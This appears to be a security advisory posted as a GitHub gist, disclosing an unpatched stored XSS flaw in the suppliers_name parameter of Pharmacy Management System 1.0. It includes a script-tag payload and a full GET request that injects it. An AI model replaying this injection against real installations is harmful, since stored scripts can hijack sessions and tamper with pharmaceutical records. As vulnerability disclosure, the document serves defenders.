Skip to content

Instantly share code, notes, and snippets.

@higordiego
Created October 19, 2024 16:08
Show Gist options
  • Save higordiego/93343006341d3799de0cb8912cc328ec to your computer and use it in GitHub Desktop.
Save higordiego/93343006341d3799de0cb8912cc328ec to your computer and use it in GitHub Desktop.

Stored XSS Vulnerability in Pharmacy Management System – Medicine Update


Affected Version:

  • Pharmacy Management System: 1.0

Vulnerability Information:

  • Vulnerability Type: Stored Cross-Site Scripting (XSS)
  • Severity: HIGH
  • Status: Unpatched

Vulnerable URL:

  • /php/manage_medicine.php?action=update&id=2&name=Crosin&packing=1&generic_name=Aaaaa32131&suppliers_name=aaa

Vulnerability Description:

A stored XSS vulnerability has been identified in the Pharmacy Management System version 1.0, specifically within the medicine update functionality. This vulnerability arises due to the absence of proper input sanitization in the suppliers_name parameter. An attacker can inject malicious JavaScript code, which will be stored persistently in the database and executed every time the medicine record is accessed.

Since the payload is executed whenever an administrator or user views or interacts with the affected page, this vulnerability can result in severe consequences, including:

  • Session hijacking
  • Theft of sensitive data (e.g., cookies, session tokens)
  • Privilege escalation (e.g., gaining unauthorized access)
  • UI defacement or manipulation (leading to phishing attacks)

This persistent XSS attack can cause long-term damage by enabling attackers to alter page behavior, steal credentials, and manipulate critical pharmaceutical records.


Proof of Concept (PoC):

Below is a sample malicious payload injected into the suppliers_name parameter:

<script>alert('XSS');</script>

Once injected, the payload is stored in the system’s database. Each time the page displaying the medicine details is accessed, the script will trigger an alert, demonstrating the XSS. However, a more advanced attacker could use this technique to redirect users, exfiltrate sensitive data, or steal sessions.


PoC Request:

GET /php/manage_medicine.php?action=update&id=2&name=Crosin&packing=1&generic_name=Aaaaa32131&suppliers_name=%3Cscript%3Ealert('XSS')%3C/script%3E HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=48068ce7875c00d88ca3aa2b9269b91f
Connection: keep-alive

After executing the above request, the malicious JavaScript will be embedded in the suppliers_name field. Any subsequent access to the affected page will trigger the XSS payload, showcasing the vulnerability.


XSS Example:

  • Stored XSS Example
  • Stored XSS Triggered

External Links:


Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment